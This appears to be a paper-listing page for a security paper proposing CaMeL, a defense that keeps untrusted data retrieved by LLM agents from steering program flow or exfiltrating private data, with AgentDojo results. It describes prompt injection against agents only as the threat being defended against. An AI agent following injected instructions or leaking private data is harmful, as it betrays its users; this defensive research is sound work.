Defeating Prompt Injections by Design (2503.18813v2)

Published 24 Mar 2025 in cs.CR and cs.AI

Abstract: LLMs are increasingly deployed in agentic systems that interact with an untrusted environment. However, LLM agents are vulnerable to prompt injection attacks when handling untrusted data. In this paper we propose CaMeL, a robust defense that creates a protective system layer around the LLM, securing it even when underlying models are susceptible to attacks. To operate, CaMeL explicitly extracts the control and data flows from the (trusted) query; therefore, the untrusted data retrieved by the LLM can never impact the program flow. To further improve security, CaMeL uses a notion of a capability to prevent the exfiltration of private data over unauthorized data flows by enforcing security policies when tools are called. We demonstrate effectiveness of CaMeL by solving $77\%$ of tasks with provable security (compared to $84\%$ with an undefended system) in AgentDojo. We release CaMeL at https://github.com/google-research/camel-prompt-injection.

Summary

We haven't generated a summary for this paper yet.

Summarize Now

Tweets

https://twitter.com/edoardo_debe/status/1938699790629343297

https://twitter.com/Jhaddix/status/1915008679574978561

https://twitter.com/philvenables/status/1911029397252968671

https://twitter.com/lbeurerkellner/status/1913204991977828708

https://twitter.com/edoardo_debe/status/1910304255518351609

https://twitter.com/edoardo_debe/status/1907076508541182326

YouTube

Show All Videos

HackerNews

CaMeL: Defeating Prompt Injections by Design (71 points, 16 comments)
Defeating Prompt Injections by Design (2 points, 0 comments)
Defeating Prompt Injections by Design (2 points, 0 comments)
Defeating Prompt Injections by Design (1 point, 0 comments)
Defeating Prompt Injections by Design (1 point, 0 comments)

Defeating Prompt Injections by Design (2503.18813v2)

Summary

Related Papers

Tweets

YouTube

HackerNews